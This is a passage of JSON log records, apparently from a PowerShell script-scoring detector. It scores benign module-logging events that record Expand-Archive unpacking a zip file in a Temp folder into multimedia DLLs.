"detect_strings_blacklist": []}, {"eventrecid": "1181139", "time": {"SystemTime": "2024-10-18T10:27:45.8676324Z"}, "totalscore": {"totalscore": 65.50039672640003, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 65.50039672640003, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Add-Type): \"Add-Type\"\nParameterBinding(Add-Type): name=\"AssemblyName\"; value=\"System.IO.Compression.FileSystem\"\n", "removed_backtick": "CommandInvocation(Add-Type): \"Add-Type\"\nParameterBinding(Add-Type): name=\"AssemblyName\"; value=\"System.IO.Compression.FileSystem\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.6550039672640002, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181141", "time": {"SystemTime": "2024-10-18T10:27:45.8680056Z"}, "totalscore": {"totalscore": 50.30973943388866, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 50.30973943388866, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Add-CompressionAssemblies): \"Add-CompressionAssemblies\"\n", "removed_backtick": "CommandInvocation(Add-CompressionAssemblies): \"Add-CompressionAssemblies\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.5030973943388866, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181142", "time": {"SystemTime": "2024-10-18T10:27:45.8749806Z"}, "totalscore": {"totalscore": 80.75512775529677, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 80.75512775529677, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileStream\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip, Open, Read\"\n", "removed_backtick": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileStream\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip, Open, Read\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.8075512775529676, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181143", "time": {"SystemTime": "2024-10-18T10:27:45.9442231Z"}, "totalscore": {"totalscore": 84.46197927656343, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 84.46197927656343, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.Compression.ZipArchive\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"System.IO.FileStream, Read, False\"\n", "removed_backtick": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.Compression.ZipArchive\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"System.IO.FileStream, Read, False\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.8446197927656343, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181144", "time": {"SystemTime": "2024-10-18T10:27:46.1147945Z"}, "totalscore": {"totalscore": 56.33757794135137, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 56.33757794135137, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"avcodec-57.dll\"\n", "removed_backtick": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"avcodec-57.dll\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.5633757794135137, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181145", "time": {"SystemTime": "2024-10-18T10:27:46.2219799Z"}, "totalscore": {"totalscore": 87.06574060513687, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 87.06574060513687, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\avcodec-57.dll\"\n", "removed_backtick": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\avcodec-57.dll\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.8706574060513687, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181146", "time": {"SystemTime": "2024-10-18T10:27:46.2309285Z"}, "totalscore": {"totalscore": 52.420479509974804, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 52.420479509974804, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "removed_backtick": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.524204795099748, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181147", "time": {"SystemTime": "2024-10-18T10:27:46.7615391Z"}, "totalscore": {"totalscore": 72.7217257066981, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 72.7217257066981, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\avcodec-57.dll'.\"\n", "removed_backtick": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\avcodec-57.dll'.\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.7272172570669809, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181149", "time": {"SystemTime": "2024-10-18T10:27:47.1244155Z"}, "totalscore": {"totalscore": 41.949542063429696, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.949542063429696, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"0\"\n", "removed_backtick": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"0\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.41949542063429696, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181151", "time": {"SystemTime": "2024-10-18T10:27:47.1250381Z"}, "totalscore": {"totalscore": 41.747568953150854, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.747568953150854, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"1\"\n", "removed_backtick": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"1\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.41747568953150854, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181152", "time": {"SystemTime": "2024-10-18T10:27:47.1262342Z"}, "totalscore": {"totalscore": 56.33757794135137, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 56.33757794135137, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"avfilter-6.dll\"\n", "removed_backtick": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"avfilter-6.dll\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.5633757794135137, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181153", "time": {"SystemTime": "2024-10-18T10:27:47.1294613Z"}, "totalscore": {"totalscore": 87.06574060513687, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 87.06574060513687, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\avfilter-6.dll\"\n", "removed_backtick": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\avfilter-6.dll\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.8706574060513687, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181154", "time": {"SystemTime": "2024-10-18T10:27:47.1375630Z"}, "totalscore": {"totalscore": 52.420479509974804, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 52.420479509974804, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "removed_backtick": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.524204795099748, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181155", "time": {"SystemTime": "2024-10-18T10:27:47.1560290Z"}, "totalscore": {"totalscore": 72.7217257066981, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 72.7217257066981, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\avfilter-6.dll'.\"\n", "removed_backtick": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\avfilter-6.dll'.\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.7272172570669809, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181157", "time": {"SystemTime": "2024-10-18T10:27:47.2513289Z"}, "totalscore": {"totalscore": 41.949542063429696, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.949542063429696, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"0\"\n", "removed_backtick": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"0\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.41949542063429696, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181159", "time": {"SystemTime": "2024-10-18T10:27:47.2517619Z"}, "totalscore": {"totalscore": 41.747568953150854, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.747568953150854, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"2\"\n", "removed_backtick": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"2\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.41747568953150854, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181160", "time": {"SystemTime": "2024-10-18T10:27:47.2523081Z"}, "totalscore": {"totalscore": 56.33757794135137, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 56.33757794135137, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"avformat-57.dll\"\n", "removed_backtick": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"avformat-57.dll\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.5633757794135137, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181161", "time": {"SystemTime": "2024-10-18T10:27:47.2529487Z"}, "totalscore": {"totalscore": 87.06574060513687, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 87.06574060513687, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\avformat-57.dll\"\n", "removed_backtick": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\avformat-57.dll\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.8706574060513687, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181162", "time": {"SystemTime": "2024-10-18T10:27:47.2538585Z"}, "totalscore": {"totalscore": 52.420479509974804, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 52.420479509974804, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "removed_backtick": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.524204795099748, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181163", "time": {"SystemTime": "2024-10-18T10:27:47.3998563Z"}, "totalscore": {"totalscore": 72.7217257066981, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 72.7217257066981, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\avformat-57.dll'.\"\n", "removed_backtick": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\avformat-57.dll'.\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.7272172570669809, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181165", "time": {"SystemTime": "2024-10-18T10:27:47.5836050Z"}, "totalscore": {"totalscore": 41.949542063429696, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.949542063429696, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"1\"\n", "removed_backtick": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"1\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.41949542063429696, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181167", "time": {"SystemTime": "2024-10-18T10:27:47.5840730Z"}, "totalscore": {"totalscore": 41.747568953150854, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.747568953150854, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"3\"\n", "removed_backtick": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"3\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.41747568953150854, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181168", "time": {"SystemTime": "2024-10-18T10:27:47.5860230Z"}, "totalscore": {"totalscore": 56.33757794135137, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 56.33757794135137, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"avutil-55.dll\"\n", "removed_backtick": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"avutil-55.dll\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.5633757794135137, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181169", "time": {"SystemTime": "2024-10-18T10:27:47.5868140Z"}, "totalscore": {"totalscore": 87.06574060513687, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 87.06574060513687, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\avutil-55.dll\"\n", "removed_backtick": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\avutil-55.dll\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.8706574060513687, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181170", "time": {"SystemTime": "2024-10-18T10:27:47.5875825Z"}, "totalscore": {"totalscore": 52.420479509974804, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 52.420479509974804, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "removed_backtick": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.524204795099748, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181171", "time": {"SystemTime": "2024-10-18T10:27:47.6213761Z"}, "totalscore": {"totalscore": 72.7217257066981, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 72.7217257066981, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\avutil-55.dll'.\"\n", "removed_backtick": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\avutil-55.dll'.\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.7272172570669809, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181173", "time": {"SystemTime": "2024-10-18T10:27:47.7944931Z"}, "totalscore": {"totalscore": 41.949542063429696, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.949542063429696, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"1\"\n", "removed_backtick": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"1\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.41949542063429696, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181175", "time": {"SystemTime": "2024-10-18T10:27:47.7949548Z"}, "totalscore": {"totalscore": 41.747568953150854, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.747568953150854, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"4\"\n", "removed_backtick": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; 